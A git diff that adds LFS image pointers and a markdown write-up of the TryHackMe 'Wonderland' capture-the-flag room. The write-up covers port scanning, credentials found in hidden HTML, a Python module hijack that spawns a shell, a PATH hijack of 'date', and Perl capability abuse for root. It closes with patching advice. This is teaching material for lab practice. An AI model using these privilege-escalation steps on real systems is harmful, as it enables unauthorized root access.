+version https://git-lfs.github.com/spec/v1
+oid sha256:cf030b66b51ce0b7385dc6084748506406ec1ee019b03abe4af9c69c60dd3050
+size 13793
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp
new file mode 100644
index 0000000..5f990ef
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b263e7a95a415e72e24d06d8f249aa39045628aa7ec9fedf2f656835ce84f1ca
+size 13468
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png
new file mode 100644
index 0000000..81dfb6a
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1bced9d847aba48b854830792a0b02a60056d882131dade37080a2b6231fff28
+size 1251849
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp
new file mode 100644
index 0000000..38401b5
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:352ce698a8a951a9e00d2d26fd314fe69af9f2b0076517c69e46b73b8955f88a
+size 161972
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png
new file mode 100644
index 0000000..af8fc9f
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0ddc137dc3fda66c9c81b3ca0cee5ab1ff76e6a897b8093e4097085b050b0169
+size 49707
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp
new file mode 100644
index 0000000..5a55faa
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1a83873affa1ec1430a8c33622138d9395fcd05d0f05b9cfbbf6c091c5e23054
+size 41162
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png
new file mode 100644
index 0000000..ceb7552
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d925edc50fb31a3d640fb2b590ad17d5ad05a29610a926f94908fb825a10236a
+size 10990
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp
new file mode 100644
index 0000000..298a1ad
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1188c0351d3d00fbeaa7e8ae32e50329a1c828f0a2cf3f16f1a4dc708cb1718c
+size 7234
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png
new file mode 100644
index 0000000..2c66461
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:945df4cd79df6df0f6b92480916b561274ca2446ee39d4fbf948f94bcdcd6cf4
+size 416267
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp
new file mode 100644
index 0000000..2076b49
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2650182d839291e13e2795d732d37c68aec125ceea835987d521cb51a5424598
+size 205044
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png
new file mode 100644
index 0000000..4f3c92f
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5928ceafb7ac2d477ef4f8a920192450e445e52eda537954669798d58b27f9ca
+size 36322
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp
new file mode 100644
index 0000000..fb47b8f
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:729cef445acf551ec1971eba3dd54c084c06952d06e923dab6fa10056e7ee3c5
+size 33916
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png
new file mode 100644
index 0000000..c5eb1fa
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:01ec977fc2776bd60239d92aa82cf58f8adc717f5b3fce24d2d609e8d6a86cdf
+size 18929
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp
new file mode 100644
index 0000000..5a71768
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:144e56bbb7e884101fb5fae7f64a85a56ea3a2369bf188e00975bc79470d3f78
+size 22504
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png
new file mode 100644
index 0000000..81f2318
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:589cc319bd281524eba53927da6e42044a1cb540782813d3498689d22c896113
+size 15054
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp
new file mode 100644
index 0000000..5864b2b
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:532792dd21292c776971a3626957ff2784334b5afcf8bf1ccb02053a3d817a89
+size 24612
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png
new file mode 100644
index 0000000..90e7f4e
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ee4b8c5e4c4d35ccbb9bba501c525a2a59403544d5fe406da313390399084db9
+size 18854
diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp
new file mode 100644
index 0000000..41f0f0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d35b3859057502af3d5695fd45a5b295aae272a2a49bba0a2923e8aa452137e7
+size 18274
diff --git a/content/writeup-ctf/writeup-wonderland-thm/index.md b/content/writeup-ctf/writeup-wonderland-thm/index.md
new file mode 100644
index 0000000..bf633e5
--- /dev/null
+++ b/content/writeup-ctf/writeup-wonderland-thm/index.md
@@ -0,0 +1,185 @@
+---
+title: "Writeup - Wonderland (THM)"
+date: 2022-05-20
+slug: "writeup-wonderland-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by scanning the pages of the site:
+
+![](img/image-3.webp)
+
+When I go to the `r` page, I see the following message:
+
+![](img/image-4.webp)
+
+So I do a recursive scan to see the complete tree:
+
+
+```bash
+ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6
+```
+I finally find the following page:
+
+![](img/image-5.webp)
+
+I look at the source code of the page and find a `p` tag with a style that does not display it. The content of this tag looks very much like credentials...
+
+
+```html
+<!DOCTYPE html>
+
+<head>
+    <title>Enter wonderland</title>
+    <link rel="stylesheet" type="text/css" href="/main.css">
+</head>
+
+<body>
+    <h1>Open the door and enter wonderland</h1>
+    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
+    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
+    </p>
+    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
+        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
+    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
+    <img src="/img/alice_door.png" style="height: 50rem;">
+</body>
+```
+So I try to connect via SSH :
+
+![](img/image-6.webp)
+
+I now have a shell and can retrieve the first flag.
+
+
+```bash
+alice@wonderland:~$ cat /root/user.txt
+thm{"Curiouser and curiouser!"}
+```
+## Privilege escalation
+
+Looking at the contents of the `home` folder, I find several users:
+
+
+```bash
+alice@wonderland:/home$ ls
+alice  hatter  rabbit  tryhackme
+```
+I am now looking at my sudo permissions:
+
+![](img/image-7.webp)
+
+So I can run this python script with the `rabbit` user's permissions. So I look at the content of this script:
+
+
+```bash
+import random
+poem = """The sun was shining on the sea,
+Shining with all his might:
+He did his very best to make
+The billows smooth and bright —
+And this was odd, because it was
+[...]
+And that was scarcely odd, because
+They’d eaten every one."""
+
+for i in range(10):
+    line = random.choice(poem.split("\n"))
+    print("The line was:\t", line)
+```
+I run it to make sure I've got it right.
+
+![](img/image-8.webp)
+
+So it's a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses `random`. So I create a `random.py` file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content :
+
+
+```bash
+import pty
+pty.spawn("/bin/bash")
+```
+I now run the script with the following command:
+
+![](img/image-9.webp)
+
+In the folder of this new user, we find the file `teaParty`. Using the `strings` command, I can find the following readable text:
+
+
+```bash
+[...]
+Welcome to the tea party!
+The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him
+[...]
+```
+The program uses the `date` command, but interestingly, the program doesn't use an absolute path. So I'll be able to create a script with the same name, and then add the folder that contains this new script to the `$PATH` variable.
+
+I start by creating the script with the following content:
+
+
+```bash
+#!/bin/bash
+/bin/bash
+```
+Then I add the execution permissions and I add my personal folder at the beginning of the `PATH` variable.
+
+
+```bash
+chmod +x date
+export PATH=/home/rabbit:$PATH
+```
+I can now run the program :
+
+![](img/image-10.webp)
+
+In the personal folder of this new user I find the following file:
+
+
+```bash
+hatter@wonderland:/home/hatter$ ls
+password.txt
+hatter@wonderland:/home/hatter$ cat password.txt 
+WhyIsARavenLikeAWritingDesk?
+```
+So I try to connect via SSH with this password:
+
+![](img/image-11.webp)
+
+After some research to do a privilege elevation I find nothing. So I try to run linpeas.sh. By analyzing the output of the command I find the following lines:
+
+![](img/image-12.webp)
+
+By going on the [GTFObins de Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) I find a way to make a privilege elevation.
+
+Using the following command, I get a root shell and I can get the last flag.
+
+![](img/image-13.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave passwords in HTML code
+- Use absolute paths in programs
+- Do not leave clear passwords in files
+- Modify Perl permissions to avoid elevation of privilege.